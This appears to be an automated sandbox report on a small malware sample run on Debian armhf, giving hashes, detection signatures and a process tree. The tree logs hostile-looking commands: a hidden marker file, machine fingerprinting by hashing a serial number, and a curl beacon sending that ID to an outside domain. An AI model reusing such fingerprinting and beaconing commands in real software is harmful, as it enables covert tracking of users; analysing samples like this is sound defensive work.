Analysis

  • max time kernel
    149s
  • max time network
    1s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    29-07-2024 07:40

General

  • Target

    3c6492a33885e363cae2841e0597c730_JaffaCakes118

  • Size

    10KB

  • MD5

    3c6492a33885e363cae2841e0597c730

  • SHA1

    99d5f88fb1a33f321aa614cfe792200bdf9eba5c

  • SHA256

    ead1f229097555af8724321021bb8bb5421947e67cd244065dbd2990a6dcdb49

  • SHA512

    302bdb0ffb3be9285e7453e04d6067ca03ebdb21af5c0f26e6cb982de1c91631bffb2aab5e2f3a298a54b93337e1b510bee87e3855503a246a130bcc87ce5193

  • SSDEEP

    192:g0AjH8A5Zjpcjxi3LKVMyIu8bXkvLvTWM3Tk3Sw3a8na8:g1cA5t8xgNb0/mVLnP

Score
4/10

Malware Config

Signatures

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118
    /tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118
    1⤵
      PID:642
      • /usr/bin/touch
        touch "/root/Library/Application Support/.upd2029"
        2⤵
          PID:644
        • /usr/bin/awk
          awk "-F\"" "/IOPlatformSerialNumber/{print \$(NF-1)}"
          2⤵
          • Reads runtime system information
          PID:647
        • /usr/bin/tr
          tr -d "\\n"
          2⤵
            PID:648
          • /usr/bin/openssl
            openssl md5
            2⤵
              PID:649
            • /usr/bin/curl
              curl -s -L "http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e"
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              PID:654

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads